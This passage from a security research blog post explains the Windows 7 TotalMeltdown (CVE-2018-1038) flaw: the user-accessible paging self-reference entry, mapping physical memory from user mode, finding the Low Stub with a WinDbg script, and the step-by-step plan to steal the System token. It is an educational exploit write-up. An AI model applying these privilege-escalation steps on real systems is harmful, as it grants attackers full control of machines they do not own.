if we want to edit the PML4 entry at index 188, we would build a virtual address with the following indexes, you can use @xpn's go script to do that:



the script is pretty straightforward, it puts each index at its right offset in the virtual address via left shifting with the right offset, then sign extend.
  • PML4 entry: self ref entry 266
  • PDP entry: 266
  • PD entry: 266
  • PT entry: 266
  • offset: 188*8
the virtual address of this would be: 0xFFFF8542A150A5E0.

If we access this address in our imaginary OS after adding the self ref entry at index 266 it would return the content of the entry at index 188 of the PML4 table. how? lets see:
  • first the MMU will read the PML4 entry at index 266 the entry is self ref entry it points to the PML4 base address, this is considered as the PDP base address.
  • then the MMU will read the PDP entry 266 in table with the base address it read before which will point again to the PML4 base. this is considered as the PD base address.
  • again the MMU will read the PML4 entry 266 and points it back to the base. this is considered as the PT base address.
  • once again the PT index 266 is used with the PML4 base address which points to the very same PML4 base. this is considered as the base address of the physical page we are trying to access with the address.
  • 188*8 is the offset of the PML4 entry at index 188 (we have to multiply by 8 because the MMU will multiply by 8 itself only when dealing with table indexes but it does not do that with the last 12 bits the page offset which makes sense otherwise we wouldn't have access to the whole page), this is added to the base address the MMU read before, which is the base of PML4 table.
eventually the final address the MMU constructs is the physical address of the entry 188 in the PML4 table.

Since we can access any entry in any table that means besides being able to edit the PML4 table, we can also translate any usermode address to its physical address, lets try to translate 0x482e50 which is a usermode address of a chunk allocated with LocalAlloc().

first the indexes of the Virtual Address:




then we need to build a Virtual Address like this:
  • PML4 index: self ref entry: 0x1ED
  • PDP index: PML4 index of the address we want to translate: 0
  • PD index: PDP index of the address we want to translate: 0
  • PT index: PD index of the address we want to translate: 2
  • offset: PT index of the address we want to translate * 8: 0x82*8 = 0x410



which gives: 0xfffff68000002410
, we read what's in this address:


in this case there is some upper flags 0xA8 (XD Execute Disable flag and the protection key to be exact) meaning No Execute is enabled for this page. as expected actually LocalAlloc() which is a wrapper to HeapAlloc() allocates chunks on the heap which is not executable due to DEP :]

PD entry (PDE) format in case of 4KiB page, src: Intel developer system programming manual

anyway clearing the upper and the lower flags gives: 0x
101ad000, this is the physical address of the physical page this address translates to.

now we add the 12 bits offset 0xe50 to it: 0x101ad000 + 0xe50 = 0x101ade50, confirm using !vtop in windbg:


The bug


Now that we understand both the paging mechanism and the self reference entry, we can explain TotalMeltdown (CVE-2018-1038), the self reference on the windows 7 os is the entry at index 0x1ED, this entry is supposed to be (and was) accessible only by the ring0 code (Kernel), but after the patch of the Meltdown Vulnerability, Microsoft has introduced this bug after setting the U (usermode) bit in this entry's flags.


This means that any program in the usermode can use this entry and access the memory it maps, and as we know it is a self ref entry and points to the base of the PML4 table, the code running at ring3 then have access to the PML4 table/page (every page holds one table) it can add or edit or remove entries.

As we are looking for a LPE we will not DOS the system by corrupting the existing inuse entries, instead we will add a new entry to the PML4 table with U (usermode) bit set and map 31GiB of physical memory (you can map as much as you like but 31GiB is more than enuf for my testing VM which has only 2GiB of ram). once we do that we have arbitrary read write of 31GiB of physical memory.

The Exploit


The initial exploit i wrote was quite simple we map 31GiB of memory with the U (usermode) flag set, then we search the mapped memory looking for the System's EPROCESS and the exploit process's EPORCESS, we do that by looking for some identifiers like the process name ("System" for the system's EPORCESS) and the process id (4 for system's EPORCESS) the exploit's process name and pid can be found at runtime, then once we find both EPROCESS structures we copy the System's EPROCESS.Token to the exploit process EPORCESS's Token.

Pretty straightforward but the memory search takes ages and when we do the 31GiB mapping we need 32 physical pages (1 PDP table and 31 PD table, no need for PT cause we use long pages 2MiB) the original exploit just overwrites whatever on the range 0x10000-0x1F000 which crashes the system most of the time.

physical memory region 0x10000 probably being used

The Low Stub to the rescue!


The Low Stub is an undefined structure named PROCESSOR_START_BLOCK it can be found in the start of a page somewhere between 0x1000-0x100000 in the physical memory (the lowest 1MiB), The Low Stub was covered in a presentation by Alex Ionescu in his talk "Getting Physical with USB Type-C" at RECON BRUSSELS 2017 conference, you can find the slides here.

From Alex Ionescu's talk slides:
This structure is used when resuming from ACPI Sleep Vector, as well as when initializing the Application Processors (APs).
this is what the structure looks like:

typedef struct _PROCESSOR_START_BLOCK {
    // The block starts with a jmp instruction to the end of the block
    FAR_JMP_16 Jmp;

    // Completion flag is set to non-zero when the target processor has
    // started
    ULONG CompletionFlag;

    // Pseudo descriptors for GDT and IDT.
    PSEUDO_DESCRIPTOR_32 Gdt32;
    PSEUDO_DESCRIPTOR_32 Idt32;
    
    // The temporary 32-bit GDT itself resides here.
    KGDTENTRY64 Gdt[PSB_GDT32_MAX + 1];
    
    // Physical address of the 64-bit top-level identity-mapped page table.
    ULONG64 TiledCr3;

    // Far jump target from Rm to Pm code
    FAR_TARGET_32 PmTarget;

    // Far jump target from Pm to Lm code
    FAR_TARGET_32 LmIdentityTarget;

    // Address of LmTarget
    PVOID LmTarget;

    // Linear address of this structure
    PPROCESSOR_START_BLOCK SelfMap;

    // Contents of the PAT msr
    ULONG64 MsrPat;

    // Contents of the EFER msr
    ULONG64 MsrEFER;

    // Initial processor state for the processor to be started
    KPROCESSOR_STATE ProcessorState;
} PROCESSOR_START_BLOCK;
the last member is of type _KPROCESSOR_STATE:


this is _KSPECIAL_REGISTERS:

and lastly _CONTEXT which is documented in winapi docs and also in windbg but its so long and doesn't fit in a screenshot:


typedef struct _CONTEXT {
  DWORD64 P1Home;
  DWORD64 P2Home;
  DWORD64 P3Home;
  DWORD64 P4Home;
  DWORD64 P5Home;
  DWORD64 P6Home;
  DWORD   ContextFlags;
  DWORD   MxCsr;
  WORD    SegCs;
  WORD    SegDs;
  WORD    SegEs;
  WORD    SegFs;
  WORD    SegGs;
  WORD    SegSs;
  DWORD   EFlags;
  DWORD64 Dr0;
  DWORD64 Dr1;
  DWORD64 Dr2;
  DWORD64 Dr3;
  DWORD64 Dr6;
  DWORD64 Dr7;
  DWORD64 Rax;
  DWORD64 Rcx;
  DWORD64 Rdx;
  DWORD64 Rbx;
  DWORD64 Rsp;
  DWORD64 Rbp;
  DWORD64 Rsi;
  DWORD64 Rdi;
  DWORD64 R8;
  DWORD64 R9;
  DWORD64 R10;
  DWORD64 R11;
  DWORD64 R12;
  DWORD64 R13;
  DWORD64 R14;
  DWORD64 R15;
  DWORD64 Rip;
  union {
    XMM_SAVE_AREA32 FltSave;
    NEON128         Q[16];
    ULONGLONG       D[32];
    struct {
      M128A Header[2];
      M128A Legacy[8];
      M128A Xmm0;
      M128A Xmm1;
      M128A Xmm2;
      M128A Xmm3;
      M128A Xmm4;
      M128A Xmm5;
      M128A Xmm6;
      M128A Xmm7;
      M128A Xmm8;
      M128A Xmm9;
      M128A Xmm10;
      M128A Xmm11;
      M128A Xmm12;
      M128A Xmm13;
      M128A Xmm14;
      M128A Xmm15;
    } DUMMYSTRUCTNAME;
    DWORD           S[32];
  } DUMMYUNIONNAME;
  M128A   VectorRegister[26];
  DWORD64 VectorControl;
  DWORD64 DebugControl;
  DWORD64 LastBranchToRip;
  DWORD64 LastBranchFromRip;
  DWORD64 LastExceptionToRip;
  DWORD64 LastExceptionFromRip;
} CONTEXT, *PCONTEXT;

as outlined in the slides of the talk the Rip member of the CONTEXT struct points to the kernel entry (nt!KiSystemStartup), and CR3 in 
_KSPECIAL_REGISTERS as you guessed holds the base address of the kernel's PML4 table.

We need these two to write the exploit, cause the self ref trick can't translate kernel mode addresses and even if it could our PML4 table has only couple of kernel mode addresses. this is due -ironically- to the meltdown vulnerability patch aka KVAS which separates the Kernel and Usermode PML4 tables (before the KVAS every process has the kernel VAS mapped to the upper half of its PML4 table) so yeah we need the Kernel's CR3 anyways. 
We will use the Kernel's CR3 to translate its addresses, the kernel entry is used to get the Kernel's EPROCESS as explained later on.

to find the low stub structure in windbg we use this hacky script:


.for (r $t0 = 0x1000; $t0 < 0x100000; r $t0 = $t0 + 0x1000) {r $t1=($pqwo(@$t0) & 0xffffffffffff00ff);.if (@$t1 == 0x00000001000600E9) {.printf "possibly found @ %p = %p\n", @$t0, @$t1;r $t1 = ($pqwo(@$t0 + 0x268) & 0xfffff80000000000);.if (@$t1 == 0xfffff80000000000) {.echo "1st check succeed";r $t3 = ($pqwo(@$t0 + 0x268));r $t2 = ($pqwo(@$t0+0xa0));.if(@$t2 == @cr3) {.echo "2nd check succeed";.printf "Kernel Entry: %p\n", @$t3;.printf "PML4: %p\n", @$t2;.break;}}}}

here is the output:


the extracted PML4 base 0x187000 is the same as CR3 register:


and for the extracted kernel entry address 0xfffff800028f7360:


well that's nt!KiSystemStartup which is the entry point of ntoskrnl.exe:


If you are wondering how does the windbg script finds the Low Stub, it does so by looking in the first 8 bytes of every page for an encoded relative jmp instruction (opcode: 0xe9), this is the first member of the PROCESSOR_START_BLOCK structure:

typedef struct _PROCESSOR_START_BLOCK {
    // The block starts with a jmp instruction to the end of the block
    FAR_JMP_16 Jmp
    ...
} PROCESSOR_START_BLOCK;

the low stub structure is at 0x7000 we can check the disassembly of the first QWORD in windbg (up command disassembles physical address):


Now that we have both the Kernel's PML4 base address (CR3) and the exploit process's PML4 base address (using self ref), we can translate any Virtual Address to its physical address, it requires a well understanding of how paging works but we can do it.

the fine exploit


Enough with introductions i believe now we can discuss what the exploit will look like and how it will take advantage of the Low Stub structure, this how it is done:
  • add a new entry to the PML4 table of the exploit process.
  • LocalAlloc() the required 32 pages for mapping 31GiB of memory (1 PDP + 31 PD).
  • create a MMU() function which can translate any virtual address to physical address.
  • use the MMU() function to translate the virtual address of every page we got from LocalAlloc() to a physical address.
  • map 31GiB of physical memory using the pages allocated with LocalAlloc() with flag U (usermode) accessible.
  • find the Low Stub, save the CR3 of the Kernel and the Kernel Entry
  • fallback to raw memory search if Low Stub is not found
  • the MMU() function should be able to translate now the privileged Virtual Addresses (ring0) after we have the CR3 of the Kernel (the PML4 base) and 31GiB of physical memory mapped.
  • find the Kernel Entry (nt!KiSystemStartup) in physical memory.
  • load ntoskrnl.exe in user mode, PE parse it, get the offset of the entry and the offset of nt!PsInitialSystemProcess.
  • calculate the address of ntoskrnl.exe base (nt) in physical memory.
  • read nt!PsInitialSystemProcess.
  • traverse the EPROCESS doubly linked list using EPROCESS.ActiveProcessLinks.
  • find the EPROCESS of the parent process.
  • duplicate the System's token.

setup_paging()


this is the function which maps 31GiB of physical memory, how it is done is easy, once we translate the virtual addresses of the usermode allocated 32 pages, we add a new entry to the PML4 table which points to the first page we have, next we identity map the physical memory starting from address 0 using 1 PML4 entry (points to the first page from LocalAlloc() ), 1 PDP table (the first page from LocalAlloc() ), and 31 PD tables (the left 31 pages from LocalAlloc() ) which is equal to 31  * 512 * 0x200000 (2MiB) = 31GiB, we use large paging (2MiB for each page instead of 4KiB) cause it is easier and requires less physical pages to setup tables i.e: we don't need PT tables/pages.

relevant flags are in green: K stands for Hypervisor/Kernel mode, U for usermode, L for large page

this diagram shows what the tables looks like after running the exploit, as you can see the self ref entry at 0x1ED points to the base of PML4 table but it has the U (usermode) flag it should have the K flag as all the entries in the upper half (the kernel half), in this example we injected an entry at index 427 or PML4 base + 427*8 which also has U (usermode) flag set (otherwise we wouldn't be able to access the memory we mapped from ring3).

if you are wondering how do we find a free PML4 entry? it's easy we just read the content of that entry if its NULL then it is not used, otherwise skip it and check next entry.

the PDP table is one of the usermode pages we got from LocalAlloc() and translated its address using MMU(), in this table we will add 31 entries each will point to a single PD table, meaning 31 PD tables, these 31 PD tables are also from the usermode pages we got from LocalAlloc() and translated its address using MMU() ( hence we need 32 pages to be allocated via LocalAlloc() ), each entry of these PD tables points to a 2MiB page in physical memory starting from physical address 0.

we use 2MiB large pages (via setting large page flag in PD entry) so no need for PT tables, originally every single PT table maps 2MiB ( 512 entry in PT table * 4KiB (0x1000 byte) page per entry = 0x200000 byte (2MiB) ) of physical memory now that we use large pages we don't need the PT tables and thus we require less physical pages.

If the CPU supports 1GiB pages and we were to use them (via setting large page flag in the PDP entry) we wouldn't need both the PD tables and the PT tables, again because originally every 1 PD table (and 512 PT table under it) maps 1GiB of physical memory ( 512 entries in PD table * 1 PT table per entry = 512 * 2MiB per PT table = 512 * 0x200000 byte = 0x40000000 byte (1GiB) ).

who knows probably at some point in the future, there will be 512GiB large page then again no need for PDP, PD and PT tables, because originally 1 PDP table (and 512 PD tables and 512*512 PT tables under it) maps 512GiB of physical memory.

MMU()


this is probably the most important function in the exploit it translates both user mode and kernel mode Virtual Addresses to physical addresses, the usermode translation is done via self ref entry, the kernel mode translation is only possible after getting both the CR3 register of the Kernel and arbitrary read write of physical memory which we both have. it also handles large pages (in which cases the PT is not used).

It works just like explained in the previous sections, we have access to the physical memory and we know the base address of the PML4 table, so we can just read and clear the flags, use the next index, read then clear the flags, eventually we will get the physical address.

In case of usermode addresses the things are easier we can just use the self ref entry to access any entry in the paging tables as long as the address is valid and usermode accessible we can translate it using only the self ref entry.

There is an exception however which kept crashing the exploit until i found out that i was trying to translate an address which uses large pages.
when large paging (usually 2MiB pages) is being used, the the large page flag is set on the flags of the PD entry, the PT is not used in this case the translation is done only via PML4 -> PDP -> PD then using both PT index and the offset directly with the PD entry (PT index is left shifted by 12).

0xfffffa80044a9060 is an example of a an address mapped to a large page:


the PD entry (PDE) flags shows L which means 2MiB large page is being used. to get the physical address we should left shift the PT index 0xa9 by 12 and OR it with the PD entry 0x7D200000
, which gives:


then we add the 12 bits offset 0x60:



our math says the physical address is: 0x7d2a9060, we can verify it with !vtop command:


the function does the same steps we did using windbg but in C.

nt!PsInitialSystemProcess


nt!PsInitialSystemProcess is a global variable in the kernel (ntoskrnl.exe) which is exported, and points to the system's EPROCESS.



we can get its offset via loading first ntoskrnl.exe with LoadLibraryExW() then using GetProcAddress() then calculate its offset within ntoskrnl.exe (
GetProcAddress((HMODULE)nt, "PsInitialSystemProcess") - LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES)).

nt!KiSystemStartup in the other hand (which we have its address in kernel space and its physical address using MMU() ) is not exported, however lucky us it is the entry of ntoskrnl.exe image which means its offset is in the optional header of the PE file in AddressOfEntryPoint.

We can verify this using windbg and PE-bear:


windbg says the offset from nt!KiSystemStartup to the base of the nt image is 0x
2a9360, now lets see on PE-bear:



PE-bear shows the same offset: 0x2a9360.

So we can just PE parse the loaded ntoskrnl.exe binary to get the offset, we subtract it from the kernel entry to get nt base address, then we add the nt!PsInitialSystemProcess offset to get the System's EPROCESS
then what's left is easy finding the parent's EPROCESS using ActiveProcessLinks list then patching its token.

Notes:

  • in this post I interpreted the PTEs as described by Intel in SDM, but in Windows world there is actually a special struct to represent this entry named nt!MMPTE_HARDWARE, and ofc these two representations do not conflict.

PoC


the exploit is available here.

a tale of a weird WebSocket based HTTP request smuggling bug

I recently played  Securinets CTF , which have hosted a Web challenge Mark4Archive by @nzeros , which required to bypass this Varnish rule :...